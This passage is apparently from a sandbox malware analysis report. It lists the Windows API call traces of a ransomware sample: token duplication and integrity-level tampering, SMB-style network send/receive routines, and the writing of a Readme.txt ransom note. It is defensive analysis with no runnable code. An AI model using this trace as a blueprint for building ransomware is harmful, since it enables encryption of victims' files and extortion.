                                                                      • Process32FirstW.KERNEL32 ref: 04858666
                                                                      • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 048586A0
                                                                      • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 048586B9
                                                                      • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 048586DF
                                                                      • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 04858708
                                                                      • memset.MSVCRT ref: 0485871E
                                                                      • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 04858738
                                                                      • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 04858767
                                                                      • CloseHandle.KERNEL32(?), ref: 048587A2
                                                                      • CloseHandle.KERNEL32(?), ref: 048587A8
                                                                      • Process32NextW.KERNEL32(?,?), ref: 048587BA
                                                                      • GetLastError.KERNEL32 ref: 048587CA
                                                                      • CloseHandle.KERNEL32(?), ref: 048587D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                                      • String ID: @
                                                                      • API String ID: 4137997400-2766056989
                                                                      • Opcode ID: 00a255e060883f9744aa42fba2ed6942a8ca052b44a3bfcab2fdc15fa2cd0367
                                                                      • Instruction ID: 655762bb1f24430bbde42378ced3513b120a3e51fca7f188d4a635082f676296
                                                                      • Opcode Fuzzy Hash: 00a255e060883f9744aa42fba2ed6942a8ca052b44a3bfcab2fdc15fa2cd0367
                                                                      • Instruction Fuzzy Hash: B0514771608301AFE720AF25D849A6FBBECFB88754F444E2EF994D21A0D734E915CB52
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 048546E4
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048546E7
                                                                        • Part of subcall function 04852497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524AF
                                                                        • Part of subcall function 04852497: HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524B8
                                                                        • Part of subcall function 04852497: GetProcessHeap.KERNEL32(00000008,00001124,74DEF380,?,?,?,0485471C,?,?,?,?,?), ref: 048524CD
                                                                        • Part of subcall function 04852497: HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 048524D0
                                                                        • Part of subcall function 04852497: rand.MSVCRT ref: 048524E1
                                                                        • Part of subcall function 04852497: htons.WS2_32(00001120), ref: 048524FF
                                                                        • Part of subcall function 04852497: rand.MSVCRT ref: 0485255F
                                                                        • Part of subcall function 04852497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,0485471C,?,?,?,?,?), ref: 04852576
                                                                        • Part of subcall function 04852497: HeapAlloc.KERNEL32(00000000,?,?,?,0485471C,?,?,?,?,?), ref: 0485257D
                                                                        • Part of subcall function 04852497: htons.WS2_32(0000015C), ref: 0485259F
                                                                        • Part of subcall function 04852497: rand.MSVCRT ref: 048525CD
                                                                      • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0485478F
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 048547B4
                                                                      • HeapFree.KERNEL32(00000000), ref: 048547B7
                                                                      • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 048547F0
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048547F9
                                                                      • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04854810
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854813
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 04854875
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854878
                                                                      • Sleep.KERNEL32(000007D0), ref: 0485488D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000029), ref: 04854897
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485489A
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 04854911
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854914
                                                                      • GetProcessHeap.KERNEL32(00000008,00000013), ref: 048549D2
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04852E32
                                                                        • Part of subcall function 04852E12: HeapAlloc.KERNEL32(00000000), ref: 04852E3B
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,00000048,74DEF380), ref: 04852E4D
                                                                        • Part of subcall function 04852E12: HeapAlloc.KERNEL32(00000000), ref: 04852E50
                                                                        • Part of subcall function 04852E12: htons.WS2_32(00000044), ref: 04852E68
                                                                        • Part of subcall function 04852E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04852EF3
                                                                        • Part of subcall function 04852E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04852F0B
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04852F31
                                                                        • Part of subcall function 04852E12: HeapFree.KERNEL32(00000000), ref: 04852F38
                                                                        • Part of subcall function 04852E12: GetProcessHeap.KERNEL32(00000008,?), ref: 04852F43
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048549D5
                                                                        • Part of subcall function 04853680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74DEF380,?,?,04854A6E,?,?,?,?,00000000,?), ref: 04853698
                                                                        • Part of subcall function 04853680: HeapAlloc.KERNEL32(00000000,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536A1
                                                                        • Part of subcall function 04853680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536B1
                                                                        • Part of subcall function 04853680: HeapAlloc.KERNEL32(00000000,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536B4
                                                                        • Part of subcall function 04853680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536C7
                                                                        • Part of subcall function 04853680: HeapAlloc.KERNEL32(00000000,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536CA
                                                                        • Part of subcall function 04853680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048537A2
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04854A96
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854A99
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                                                      • String ID:
                                                                      • API String ID: 3041643382-0
                                                                      • Opcode ID: 227f32905f65fa8b08c4b48b9d8331582cdced1c3146ce3987f2201e86953b9e
                                                                      • Instruction ID: dc05a8db4dc09ed80ec3f2bf4f34c721650f0c02c3c27978618f866c4e5ffe57
                                                                      • Opcode Fuzzy Hash: 227f32905f65fa8b08c4b48b9d8331582cdced1c3146ce3987f2201e86953b9e
                                                                      • Instruction Fuzzy Hash: A2C1DF7140034AEEDB10DFA4C804BAABBB5FF49744F008919FC85DB6A0E774E994DB61
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04856118
                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 04856136
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04856170
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 04856191
                                                                      • memset.MSVCRT ref: 048561C8
                                                                      • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 048561E2
                                                                      • StrCatW.SHLWAPI(?,?), ref: 048561EE
                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0485621B
                                                                      • FlushFileBuffers.KERNEL32(00000000), ref: 04856226
                                                                      • LocalFree.KERNEL32(?), ref: 0485622F
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 04856236
                                                                      Strings
                                                                      • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 048561D6
                                                                      • Readme.txt, xrefs: 04856107
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                                                      • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt
                                                                      • API String ID: 1343258794-115798760
                                                                      • Opcode ID: 069bf18166637ab30e3c6faa2506b0cd72c6b975afc5fdb4910444de79246479
                                                                      • Instruction ID: 9cb2375b05f5cbd29d9428fe2acb0dbc36d4be4efb4310705b28b06b2b098678
                                                                      • Opcode Fuzzy Hash: 069bf18166637ab30e3c6faa2506b0cd72c6b975afc5fdb4910444de79246479
                                                                      • Instruction Fuzzy Hash: 16317376500208ABDB219B64ED48D9B7BFCEB49700B448A55FD0AD2050EB39FA44CBA0
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 04851ED2
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851EDB
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0485943A), ref: 04851F1F
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851F22
                                                                      • htons.WS2_32(?), ref: 04851F41
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04851FF1
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04852008
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A), ref: 0485202B
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852032
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0485943A), ref: 0485203D
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852044
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                      • String ID: ?????
                                                                      • API String ID: 1780562090-2358547729
                                                                      • Opcode ID: c4f6748814f1f9c040f96318b976440514de91d2473c10368ed7be7504fe4ccc
                                                                      • Instruction ID: 58c335e8203dd4c2c8e0bb1fb5109180fce4a2eb66d8c6203701074bd09b05c8
                                                                      • Opcode Fuzzy Hash: c4f6748814f1f9c040f96318b976440514de91d2473c10368ed7be7504fe4ccc
                                                                      • Instruction Fuzzy Hash: E45108359003469FDB11CF68D848AAA7FF9EF49340B058A95FC84DB361DB35E809C750
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,74DEF380,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04853089
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853092
                                                                      • GetProcessHeap.KERNEL32(00000008,0000003F,74DEDF60,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 048530A4
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 048530A7
                                                                      • htons.WS2_32(0000003B), ref: 048530BF
                                                                      • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 048530F7
                                                                      • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 0485310D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853127
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0485312E
                                                                      • memcpy.MSVCRT(00000000,0000002F,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853144
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853153
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0485315A
                                                                      • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853165
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0485316C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                                                      • String ID:
                                                                      • API String ID: 317911368-0
                                                                      • Opcode ID: 1d8fcc78d6420df5d02f51f3b1cd1a84c783ede3978352fe838ba1f534fd2c1d
                                                                      • Instruction ID: 2a84e082e861960c7a633ff982f674a4a650a128323c22ed9d80c9fdd518b6c9
                                                                      • Opcode Fuzzy Hash: 1d8fcc78d6420df5d02f51f3b1cd1a84c783ede3978352fe838ba1f534fd2c1d
                                                                      • Instruction Fuzzy Hash: 26318F71540305BBEB116FF4DC49F6A7BADEF88341F148859FD04DB290DA79A844CB25
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 04858944
                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 0485894B
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0485896D
                                                                      • GetLastError.KERNEL32 ref: 0485897E
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0485898F
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 048589A8
                                                                      • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 048589BF
                                                                      • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 048589D2
                                                                      • GetLastError.KERNEL32 ref: 048589FD
                                                                      • GlobalFree.KERNEL32(00000000), ref: 04858A00
                                                                      • GetLastError.KERNEL32 ref: 04858A08
                                                                      • CloseHandle.KERNEL32(?), ref: 04858A0F
                                                                      • GetLastError.KERNEL32 ref: 04858A17
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1283781744-0
                                                                      • Opcode ID: 4d3a4b677e5937346386efb8a178f0117b5e4594bd9d0c4bb26a691903a72402
                                                                      • Instruction ID: 4a12e5d844387762f342d3a8a8dac373dff615559bf8e4339e01c5826c83df33
                                                                      • Opcode Fuzzy Hash: 4d3a4b677e5937346386efb8a178f0117b5e4594bd9d0c4bb26a691903a72402
                                                                      • Instruction Fuzzy Hash: 23318135900205EFEB12AF61DC48B9DBFB8EF00740F104A52ED01E2060D739AD91DB66
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04852F73
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852F7C
                                                                      • GetProcessHeap.KERNEL32(00000008,?,7598C650), ref: 04852F97
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852F9A
                                                                      • htons.WS2_32(424D53FE), ref: 04852FBA
                                                                      • memcpy.MSVCRT(00000040,?,?), ref: 0485300B
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 0485301B
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04853032
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04853048
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485304F
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 0485305A
                                                                      • HeapFree.KERNEL32(00000000), ref: 04853061
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                      • String ID:
                                                                      • API String ID: 2433318192-0
                                                                      • Opcode ID: c83219345e66c0102959e3d9c63134c54ba176f64936fa526237b6baf17e8eb8
                                                                      • Instruction ID: ec5e8d610332caa7daa13f33d6421efedd883c245a8076da7e8ce1789a4309b0
                                                                      • Opcode Fuzzy Hash: c83219345e66c0102959e3d9c63134c54ba176f64936fa526237b6baf17e8eb8
                                                                      • Instruction Fuzzy Hash: 7131AF75900345ABEF10AFA9D888A9A7BFCFF48340F058455FD08EB251E779D944CB25
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 048532CB
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048532D4
                                                                      • GetProcessHeap.KERNEL32(00000008,?,74DEF380), ref: 048532EF
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048532F2
                                                                      • htons.WS2_32(?), ref: 0485330F
                                                                      • memcpy.MSVCRT(0000004D,?,?), ref: 0485333D
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04853350
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04853368
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0485337B
                                                                      • HeapFree.KERNEL32(00000000), ref: 04853382
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 0485338D
                                                                      • HeapFree.KERNEL32(00000000), ref: 04853394
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                      • String ID:
                                                                      • API String ID: 2433318192-0
                                                                      • Opcode ID: 5a192c88969dbbb40ddd30aadf923ff796c219a6d1e93a6028995114a790066b
                                                                      • Instruction ID: b9f637c068388adaa20d2c930f740085afad96a799f296168a79e43a94a252db
                                                                      • Opcode Fuzzy Hash: 5a192c88969dbbb40ddd30aadf923ff796c219a6d1e93a6028995114a790066b
                                                                      • Instruction Fuzzy Hash: CA317F7190030ABBEB009FA9AC45EAE7BACEF49351F048555FD00EB291DB78ED05CB60
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851DE9
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851DF2
                                                                      • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E04
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E07
                                                                      • htons.WS2_32(00000027), ref: 04851E21
                                                                      • send.WS2_32(?,00000000,0000002B,00000000), ref: 04851E4A
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04851E63
                                                                      • memset.MSVCRT ref: 04851E81
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E90
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E97
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851EA2
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851EA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                                                      • String ID:
                                                                      • API String ID: 255267840-0
                                                                      • Opcode ID: c2d03953a84c7cefdeefb7b0c8457291a94bda40268f4d71c819fe1cae001b33
                                                                      • Instruction ID: 1d13caacd58b1b0eafa4325b0dac94b0e02d3864e853739ca495eee3cda56baa
                                                                      • Opcode Fuzzy Hash: c2d03953a84c7cefdeefb7b0c8457291a94bda40268f4d71c819fe1cae001b33
                                                                      • Instruction Fuzzy Hash: D0217E71A00305BBEB105FA99C49F6A7BACFF49750F048959BD04DB291DBB8E804C765
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74DEF380), ref: 048541FD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854204
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540F8
                                                                        • Part of subcall function 048540E3: HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540FB
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 04854148
                                                                        • Part of subcall function 048540E3: HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 0485414B
                                                                        • Part of subcall function 048540E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?,00000000), ref: 04854184
                                                                        • Part of subcall function 048540E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,0485423E,?,?,?,0485423D,?,?,?,?,00000000), ref: 048541BC
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?), ref: 048541CB
                                                                        • Part of subcall function 048540E3: HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541CE
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541D7
                                                                        • Part of subcall function 048540E3: HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541DA
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 04854287
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485428E
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 048542D9
                                                                      • HeapFree.KERNEL32(00000000), ref: 048542E0
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04854336
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485433D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,74DEF380,?,00000000,00000100,?), ref: 04854399
                                                                      • HeapFree.KERNEL32(00000000), ref: 048543A0
                                                                      • memset.MSVCRT ref: 048543AE
                                                                        • Part of subcall function 04853D0D: rand.MSVCRT ref: 04853EC3
                                                                        • Part of subcall function 04853D0D: memset.MSVCRT ref: 04853EFC
                                                                        • Part of subcall function 04853D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04853F38
                                                                        • Part of subcall function 04853D0D: htons.WS2_32(?), ref: 04853F5C
